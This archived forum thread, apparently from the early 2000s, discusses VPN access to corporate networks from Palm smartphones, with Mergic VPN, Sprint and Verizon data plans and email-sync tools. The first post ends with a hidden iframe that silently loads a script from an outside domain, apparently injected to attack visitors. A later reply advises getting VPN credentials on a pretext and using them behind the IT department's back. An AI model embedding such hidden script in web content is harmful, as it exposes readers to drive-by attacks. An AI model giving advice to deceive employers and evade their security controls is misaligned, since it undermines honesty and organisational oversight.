+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 27
  1. #1
    Registered User
    Join Date
    09-09-2002
    Posts
    463

    VPN Access to Corporate Network via Express Network

    There have been several references to VPN in various links but I thought it would be nice to consolidate into one for discussion purposes.

    While connected to the Express Network you will most likely need a VPN (virtual private network) client to connect into your network.

    There is a work around for those of you that don't want to go the VPN way and that is to forward your email to another server that offers synchronization like DataViz via there InBox2Go program. If you already own Documents2Go you will be able to sync your email with attachments via Verizon's High Speed Network.

    Those of you that are gluttons for punishment or like me are too cheap to spend the 69.95 a year for the service will have to convince your IT dept that a VPN alternative is an option.

    It my understanding that you require the appropriate VPN client for the type of servers your company runs. My company uses Cisco.

    I'd like to open it up for discussion as to how best to accomplish the VPN scenerio. For you network admins out there, if I've mispoken something please correct me as I know enough to be dangerous. My IT dept has told me that I cannot use a VPN on the Palm for two reasons: Its on a palm and they don't thing tunneling is secure. Discuss....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Mergic VPN is a one time cost for the client if your company has VPN access available, including Cicso:
    • Runs on Palm OS Devices with an English version of Palm
    • OS 3.1 or higher.
    • Supports the Point-to-Point Tunneling Protocol (PPTP).
      Auto Connect. Allows user selected Palm OS applications to automatically connect to and disconnect from the VPN server as needed without requiring the user to launch the Mergic VPN application.
    • VPN connection indicator on non-color Palm OS devices. A small flashing vertical bar in the upper right hand corner of the screen indicates an active network connection on a Palm OS device. When a connection with a VPN server is active this bar is replaced with a small flashing square.
    • Multiple VPN configurations.
      Compatible with Point-to-Point Protocol TCP/IP based network connections, including connections using wireline and wireless modems, smartphones, 802.11b (Wi-Fi) wireless LANs, mobile phones connected to handhelds using Bluetooth, infrared or cable, and GSM, GPRS, TDMA, CDMA and CDPD networks.
    • Support for 40, 56 and 128-bit Microsoft Point-to-Point Encryption (MPPE) in both stateless and stateful modes. Mergic VPN attempts to connect with the VPN server using the strongest (128-bit, stateless) encryption available. If the VPN server doesn't support that level of encryption Mergic VPN will try to connect with the next strongest level of encryption. This negotiation process continues until the weakest (40-bit, stateful) level of encryption is tried.
    • Supports the PAP, CHAP, MS-CHAPv1, and MS-CHAPv2 authentication protocols. For security reasons, PAP authentication is disabled by default and, also by default, if the VPN server attempts to negotiate MS-CHAPv1, NT type responses are enabled and LAN Manager type responses are disabled. PAP authentication and LAN Manager type responses can be enabled by turning off the Encryption Required setting in Mergic VPN.
    • Highly optimized encryption and authentication routines provide fast authentication and good performance over all network types, including 3G wireless networks and 802.11b wireless LANs.
    • Automatic and/or manual configuration of the Domain Name Service (DNS) server addresses to be used on the private network.
    • Automatic and/or manual configuration of the IP address to be used on the private network.
    • Detailed diagnostic logging.

    www.mergic.com

  3. #3
    Registered User
    Join Date
    11-06-2002
    Posts
    20
    This is one of my major concerns about getting this phone on Verizon. Not being a techie, I may have this wrong, but aren't all these e mail access problems avoided if/when Sprint carries the phone on its PCS w/ Vision program. My understanding is that their Business Connect(?) feature will allow "push" e mail, even through a corporate fire wall. Is this correct? Also, isn't web browsing much simplified on Sprint, since you don't need a seperate ISP?? Those two features, coupled with unlimited data for $10 seem to make it worthwile to wait for Sprint to carry the phone. Am I missing something? Also, does anyone have experience with Sprint's service/coverage in the St. Louis area?

  4. #4
    Registered User
    Join Date
    11-14-2002
    Posts
    821

    Re: VPN Access to Corporate Network via Express Network

    Originally posted by pdageek
    There is a work around for those of you that don't want to go the VPN way and that is to forward your email to another server that offers synchronization like DataViz via there InBox2Go program. If you already own Documents2Go you will be able to sync your email with attachments via Verizon's High Speed Network.
    Trust me. Your IT department will be very dissappointed with you if you forward your email outside the corporate network...

    -Quick

  5. #5
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    Originally posted by narflegarthog
    This is one of my major concerns about getting this phone on Verizon. Not being a techie, I may have this wrong, but aren't all these e mail access problems avoided if/when Sprint carries the phone on its PCS w/ Vision program. My understanding is that their Business Connect(?) feature will allow "push" e mail, even through a corporate fire wall. Is this correct? Also, isn't web browsing much simplified on Sprint, since you don't need a seperate ISP?? Those two features, coupled with unlimited data for $10 seem to make it worthwile to wait for Sprint to carry the phone. Am I missing something? Also, does anyone have experience with Sprint's service/coverage in the St. Louis area?

    yes, biz connect does this. you install it on your pc and it runs in the background(the phone and pc generate a secure key between the two so conection is more secure than the first version), notifing you of email. it is pushed to you and you can set up a number of ways to be notified of new mail. it even has a smart sync feature for the palm that syncs mail according to your current batery life... the less battery life you have, the less sync times it does. you can even get into your pc's files and retrieve them to the device. i use it daily and its pretty neat.

    the data plans are good and yes yohu dont need an isp, and even if you did have one you still had to go thru sprint anyway.

    and depending on which plane you get, unlimited vision is included for free.
    i dont know about coverage in your area but sprint works well for me here in my neck of the woods.

  6. #6
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Originally posted by HoTSynC
    Mergic VPN is a one time cost for the client if your company has VPN access available, including Cicso:
    • Runs on Palm OS Devices with an English version of Palm
    • OS 3.1 or higher.
    • Supports the Point-to-Point Tunneling Protocol (PPTP).
      Auto Connect. Allows user selected Palm OS applications to automatically connect to and disconnect from the VPN server as needed without requiring the user to launch the Mergic VPN application.
    • VPN connection indicator on non-color Palm OS devices. A small flashing vertical bar in the upper right hand corner of the screen indicates an active network connection on a Palm OS device. When a connection with a VPN server is active this bar is replaced with a small flashing square.
    • Multiple VPN configurations.
      Compatible with Point-to-Point Protocol TCP/IP based network connections, including connections using wireline and wireless modems, smartphones, 802.11b (Wi-Fi) wireless LANs, mobile phones connected to handhelds using Bluetooth, infrared or cable, and GSM, GPRS, TDMA, CDMA and CDPD networks.
    • Support for 40, 56 and 128-bit Microsoft Point-to-Point Encryption (MPPE) in both stateless and stateful modes. Mergic VPN attempts to connect with the VPN server using the strongest (128-bit, stateless) encryption available. If the VPN server doesn't support that level of encryption Mergic VPN will try to connect with the next strongest level of encryption. This negotiation process continues until the weakest (40-bit, stateful) level of encryption is tried.
    • Supports the PAP, CHAP, MS-CHAPv1, and MS-CHAPv2 authentication protocols. For security reasons, PAP authentication is disabled by default and, also by default, if the VPN server attempts to negotiate MS-CHAPv1, NT type responses are enabled and LAN Manager type responses are disabled. PAP authentication and LAN Manager type responses can be enabled by turning off the Encryption Required setting in Mergic VPN.
    • Highly optimized encryption and authentication routines provide fast authentication and good performance over all network types, including 3G wireless networks and 802.11b wireless LANs.
    • Automatic and/or manual configuration of the Domain Name Service (DNS) server addresses to be used on the private network.
    • Automatic and/or manual configuration of the IP address to be used on the private network.
    • Detailed diagnostic logging.

    www.mergic.com
    Has anybody with a 7135 used a VPN app like this to perfrom a network hotsync to a machine on a corporate network via express network?
    iPhone therefore iAm.

  7. #7
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Yeeeeeeeeeeeeeeeeeeeeeeeeeeesssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss

    Get my drift? It's ok as long as you turn off everything but what you need updated (address book, calender, to-dos, memos). If they get the Express network up to 128kbps+, then it will be like a serial sync, provided 128kbps is the slowest link in the whole chain.

  8. #8
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Cool. Let's hope for 128kbps then! Thanks HoTSynC
    iPhone therefore iAm.

  9. #9
    Registered User
    Join Date
    09-09-2002
    Posts
    463
    Hotsync--My IT dept only wants to support VPN on PC or Mac. What's the best method to bringing them around to supporting it on the palm.

    I've opted to not require a laptop for my workstation but instead use a desktop system at the office. This is a savings to my company. They do have me hooked up via RAS but I can only connect at 14.4 and won't be able to take advantage of the Express Network that I'm paying out of my own pocket.

    Any suggestions on security via VPN on the palm would be helpful to help build a case.

  10. #10
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    They don't want to take the time to work with you on a platform they don't currently support is what it boils down to. Just get your laptop, or even if you can't get it now, tell them you need VPN for your home PC to do your work from home. Then they will set you up with a VPN account (username and password) as well as the VPN server address.

    Get yourself a copy of Mergic VPN and use the login info they gave you for your laptop/home PC. They will never know.....

  11. #11
    Registered User
    Join Date
    07-13-2001
    Posts
    152
    Originally posted by narflegarthog
    This is one of my major concerns about getting this phone on Verizon. Not being a techie, I may have this wrong, but aren't all these e mail access problems avoided if/when Sprint carries the phone on its PCS w/ Vision program. My understanding is that their Business Connect(?) feature will allow "push" e mail, even through a corporate fire wall. Is this correct? Also, isn't web browsing much simplified on Sprint, since you don't need a seperate ISP?? Those two features, coupled with unlimited data for $10 seem to make it worthwile to wait for Sprint to carry the phone. Am I missing something? Also, does anyone have experience with Sprint's service/coverage in the St. Louis area?
    Well a couple of things here. First off VZW has the same abilities as the "Vision" and the "Business Connect" simply go to www.verizonwirless.com and click on the data services and business solutions.

    Secondly the $10 a month unlimited is A:-- limited time only, meaning I'm pretty sure they've stated they are not going to offer this price rate going forward. (I'm not sure on the cut off date) and on top that it's ONLY for browsing the internet from the handset. They won't allow this service for someone who wants to hook the handset up to a laptop and browse using 1xRTT that way.

    I would lay odds that they will not allow that plan on the 7135.

    Now that being said neither VZW or Sprint have announced any new "data rates" in regards to the 7135 or like phones.

  12. #12
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    you can use the unlimited data service on sprint. as i have stated i have the i330 and i have unlimited data (free with my plan BTW) and i have been able to use it as a modem (mostly to test the throughput and play around, but i dont need to do that often since i have my air card). some have ststed they still have this available, but im with you semm, i dont think they will keep it up for long. they may have some decent plans in the next month or so when they release their new phones...

  13. #13
    Registered User
    Join Date
    01-15-2003
    Posts
    53

    help a non-techie get corporate email

    In the hopes that others are reading this thread like me barely able to understand the jargon, let me pose 2 very straightforward questions.

    Situation: My IT department says they are testing various PDAs to synchronize email. They move at a snail's pace, and I have no hope they will move beyond the current blackberry capability they offer.

    Desire: I would like to receive corporate email on whatever PDA/smartphone I get. Ideally, I'd like to be able to reply through my normal corporate email address so that back-and-forth email correspondence doesn't involve multiple email accounts. however, this is not an absolute requirement. I'm not too concerned about deleting messages on my PDA and having them also deleted on the corporate server either, but it might be nice.
    I would like to be able to read attachments, even if it's only in read-only format, as many of my email come with something to look at in Word, Excel or Powerpoint.

    Question 1: Assuming I walk home from the store with one of these, can I fulfill the above desire without ever having to interact with my corporate IT department and how? I'd be happy to pay personal out of pocket money to make this happen, if it will really work. I don't trust my IT department to be very helpful in the near future. This is not a priority for them.

    Question 2: I'm really interested in internet browing capability. With Sprint, it sounds like I can just sign up for their service, which would include an email account if I wanted. Treo has its own email, Palm does too. Assuming, again, that I walk home from the store with this device and quickly get started without getting bogged down, will I be able to pull it out, charge it, and go surfing or will I need to set up an ISP (as I have at home with Earthlink)?

    Sorry to have to cut through the technical stuff.

    Mark

  14. #14
    Registered User
    Join Date
    07-25-2001
    Location
    Lithia FL (Tampa Bay Area)
    Posts
    297

    Re: help a non-techie get corporate email

    Try www.notifycorp.com I am using their NotifyLink program, which took NO assistance to set up from my IT department.

    They currently do not support attachments, but are supposedly in beta with a new version that does support attachments.

    $50 to buy the program outright.

    Works well overall, but eats up some minutes on my plan.

    Jeff

    PS If you do a search on Corp e-mail you'll most likely find a few threads going about this topic.

    Originally posted by msneider

    Desire: I would like to receive corporate email on whatever PDA/smartphone I get. Ideally, I'd like to be able to reply through my normal corporate email address so that back-and-forth email correspondence doesn't involve multiple email accounts. however, this is not an absolute requirement. I'm not too concerned about deleting messages on my PDA and having them also deleted on the corporate server either, but it might be nice.
    I would like to be able to read attachments, even if it's only in read-only format, as many of my email come with something to look at in Word, Excel or Powerpoint.

    Question 1: Assuming I walk home from the store with one of these, can I fulfill the above desire without ever having to interact with my corporate IT department and how? I'd be happy to pay personal out of pocket money to make this happen, if it will really work. I don't trust my IT department to be very helpful in the near future. This is not a priority for them.

    Mark
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile


    E-mail: djjefft@aol.com
    AIM: djjefft

  15. #15
    Registered User
    Join Date
    09-13-2002
    Posts
    363
    Can I VPN with QNC and not EN. If yes, how's the KB transfer rate compare to a regular modem. Do I need a ISP in order to work for VPN using QNC? I know someone probably already mention this but I'm new to these connection on the 7135. I don't have a 6035 before so this will be my first smartphone.

  16. #16
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by nl4jy
    Can I VPN with QNC and not EN. If yes, how's the KB transfer rate compare to a regular modem. Do I need a ISP in order to work for VPN using QNC? I know someone probably already mention this but I'm new to these connection on the 7135. I don't have a 6035 before so this will be my first smartphone.
    The data rate on QNC is 14.4kbs. This is 1/2 of the slowest connection you would typically expect to see with a modern 56Kbs modem (in poor line quality conditions, a 56Kbs modem will step back to 28.8, but in general, will disconnect rather then attempting anything slower).

    EN speed varies, but can peak to 153Kbs and is typically > 40Kbs.

    Alan

  17. #17
    Registered User
    Join Date
    02-06-2003
    Location
    MA
    Posts
    189

    Mergic VPN

    Has anyone had any success getting the Mergic VPN to work with QNC to connect to their corporate network?

    I have not been able to get it to work. Any settings assistance would be appreciated.
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

  18. #18
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Yes, I have. Perhaps your company's PPTP server settings require a protocol not supported over the carriers QNC CSD connection?

  19. #19
    Registered User
    Join Date
    10-03-2002
    Posts
    32

    VPN uses

    Maybe I'm brain-dead this morning but other than VCN and Network Hotsync, how would one use VPN on the 7135 ?

    Enlighten me...or send coffee.

    Ham

  20. #20
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    VPN is a secure tunneling protocol allowing you to gain access through a firewall for intranet adn mail access on your corporate servers that are normally blocked.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts